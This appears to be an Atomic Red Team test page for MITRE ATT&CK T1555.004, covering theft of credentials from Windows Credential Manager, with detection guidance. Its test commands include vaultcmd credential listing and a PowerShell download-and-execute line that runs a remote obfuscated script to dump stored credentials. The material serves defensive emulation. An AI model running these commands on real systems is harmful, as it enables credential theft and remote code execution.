# T1555.004 - Credentials from Password Stores: Windows Credential Manager
Adversaries may acquire credentials from the Windows Credential Manager. The Credential Manager stores credentials for signing into websites, applications, and/or devices that request authentication through NTLM or Kerberos in Credential Lockers (previously known as Windows Vaults).(Citation: Microsoft Credential Manager store)(Citation: Microsoft Credential Locker)

The Windows Credential Manager separates website credentials from application or network credentials in two lockers. As part of [Credentials from Web Browsers](https://attack.mitre.org/techniques/T1555/003), Internet Explorer and Microsoft Edge website credentials are managed by the Credential Manager and are stored in the Web Credentials locker. Application and network credentials are stored in the Windows Credentials locker.

Credential Lockers store credentials in encrypted `.vcrd` files, located under `%Systemdrive%\Users\\[Username]\AppData\Local\Microsoft\\[Vault/Credentials]\`. The encryption key can be found in a file named <code>Policy.vpol</code>, typically located in the same folder as the credentials.(Citation: passcape Windows Vault)(Citation: Malwarebytes The Windows Vault)

Adversaries may list credentials managed by the Windows Credential Manager through several mechanisms. <code>vaultcmd.exe</code> is a native Windows executable that can be used to enumerate credentials stored in the Credential Locker through a command-line interface. Adversaries may also gather credentials by directly reading files located inside of the Credential Lockers. Windows APIs, such as <code>CredEnumerateA</code>, may also be absued to list credentials managed by the Credential Manager.(Citation: Microsoft CredEnumerate)(Citation: Delpy Mimikatz Crendential Manager)

Adversaries may also obtain credentials from credential backups. Credential backups and restorations may be performed by running <code>rundll32.exe keymgr.dll KRShowKeyMgr</code> then selecting the “Back up...” button on the “Stored User Names and Passwords” GUI.

Password recovery tools may also obtain plain text passwords from the Credential Manager.(Citation: Malwarebytes The Windows Vault)

## Atomic Tests

### Atomic Test #1 - Access Saved Credentials via VaultCmd
List credentials currently stored in Windows Credential Manager via the native Windows utility vaultcmd.exe
Credential Manager stores credentials for signing into websites, applications, and/or devices that request authentication through NTLM or Kerberos
https://blog.malwarebytes.com/101/2016/01/the-windows-vaults/
https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16

**Supported Platforms:** windows
#### Attack Commands: Run with `command_prompt`
```command_prompt
vaultcmd /listcreds:"Windows Credentials"
```

In [ ]:
Invoke-AtomicTest T1555.004 -TestNumbers 1

### Atomic Test #2 - WinPwn - Loot local Credentials - Invoke-WCMDump
Loot local Credentials - Invoke-WCMDump technique via function of WinPwn
**Supported Platforms:** windows
#### Attack Commands: Run with `powershell`
```powershell
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Creds/master/obfuscatedps/DumpWCM.ps1')
Invoke-WCMDump```

In [ ]:
Invoke-AtomicTest T1555.004 -TestNumbers 2

## Detection
Monitor process and command-line parameters of <code>vaultcmd.exe</code> for suspicious activity, such as listing credentials from the Windows Credentials locker (i.e., <code>vaultcmd /listcreds:“Windows Credentials”</code>).(Citation: Malwarebytes The Windows Vault)

Consider monitoring API calls such as <code>CredEnumerateA</code> that may list credentials from the Windows Credential Manager.(Citation: Microsoft CredEnumerate)(Citation: Delpy Mimikatz Crendential Manager)

Consider monitoring file reads to Vault locations, <code>%Systemdrive%\Users\\[Username]\AppData\Local\Microsoft\\[Vault/Credentials]\</code>, for suspicious activity.(Citation: Malwarebytes The Windows Vault)